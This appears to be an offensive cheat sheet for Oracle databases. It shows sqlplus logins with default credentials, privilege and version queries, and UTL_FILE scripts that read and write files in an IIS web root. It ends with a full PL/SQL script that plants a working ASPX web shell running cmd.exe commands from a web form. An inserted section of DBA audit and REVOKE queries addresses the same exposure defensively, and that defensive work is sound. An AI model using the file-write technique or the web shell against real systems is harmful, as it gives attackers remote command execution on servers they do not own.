
Oracle Database

Basics

Oracle Connection command

Linux:

sqlplus64 <user>/<password>@<host-IP>:1521/<sid>

Example with the default user ID and password:

sqlplus64 scott/tiger@127.0.0.1:1521/XE

Oracle Connection command as sysdba

Connecting as the system database administrator:

sqlplus64 <user>/<password>@<host-IP>:1521/<sid> as sysdba

Oracle Check user privileges on database

select * from session_privs;
select * from user_role_privs;

Oracle version:

select banner from v$version; 

System information:

SELECT platform_id, platform_name FROM v$database; 
SELECT dbms_utility.port_string FROM DUAL; 
SELECT PRODUCT, VERSION FROM SYS.PRODUCT_COMPONENT_VERSION;   

Oracle Reading file from file system

Set the SQL*Plus serveroutput setting to ON so that dbms_output text is displayed:

SQL> set serveroutput on

SQL code to Read a file from the file system:

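Read the iisstart.htm file
declare
  f utl_file.file_type;  -- file handle
  s varchar2(200);       -- buffer for one line of the file
begin
  -- open iisstart.htm in /inetpub/wwwroot for reading
  f := utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
  -- read the first line of the file into s
  utl_file.get_line(f,s);
  utl_file.fclose(f);
  -- print the line (needs serveroutput on)
  dbms_output.put_line(s);
end;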

Enter a forward slash (/) on its own line to execute the script.

Oracle Write to a file

When executed, this script creates the cybofile.txt file in the /inetpub/wwwroot directory and writes the contents of the payload variable to it.

Write to a file
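declare
  f utl_file.file_type;  -- file handle
  payload varchar2(5000) := 'Hello world';  -- data to write
begin
  -- open (create or overwrite) cybofile.txt in /inetpub/wwwroot for writing
  f := utl_file.fopen('/inetpub/wwwroot','cybofile.txt','W');
  -- write the payload as a single line
  utl_file.put_line(f,payload);
  utl_file.fclose(f);
end;
/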
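
The read and write scripts above only work when the connected account can execute UTL_FILE and the database is allowed to reach the target path. The following audit queries are an added example, not part of the original page, that a DBA can run to see where that exposure exists and to remove the blanket grant; app_owner is a hypothetical account name.

```sql
-- Added audit example (not from the original page). Run as a DBA in SQL*Plus.

-- 1. Who can execute UTL_FILE? A PUBLIC grant lets every account use it.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_FILE'
 ORDER BY grantee;

-- 2. Legacy path allow-list. A '*' or a web root here is a finding.
--    Returns no rows on releases where the parameter no longer exists.
SELECT name, value
  FROM v$parameter
 WHERE name = 'utl_file_dir';

-- 3. Directory objects and who can read or write through them.
--    Look for paths under a web root such as the one used above.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
  FROM dba_directories d
  LEFT JOIN dba_tab_privs p
    ON p.owner = 'SYS'
   AND p.table_name = d.directory_name
   AND p.privilege IN ('READ', 'WRITE')
 ORDER BY d.directory_path, p.grantee;

-- 4. Accounts still using a well-known default password (e.g. scott/tiger).
SELECT d.username, u.account_status
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 ORDER BY d.username;

-- 5. Accounts allowed to connect AS SYSDBA or AS SYSOPER.
SELECT username, sysdba, sysoper
  FROM v$pwfile_users;

-- Hardening: remove the blanket grant, then grant back only where needed.
REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
-- app_owner is a hypothetical account name used for illustration.
-- GRANT EXECUTE ON sys.utl_file TO app_owner;
```

Revoking the PUBLIC grant can invalidate stored code that depends on UTL_FILE, so check dba_dependencies for references to it before running the REVOKE.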

Oracle Shells

Oracle doesn't allow writing more than 1024 characters, so pay attention to the length when building the payload.

PL/SQL aspx

Writing a shell.aspx file. Newlines and comments have been stripped out of the payload to reduce its size.

PL/SQL script
declare
f utl_file.file_type;
payload varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
f := utl_file.fopen('/inetpub/wwwroot','shell.aspx','W');
utl_file.put_line(f,payload);
utl_file.fclose(f);
end;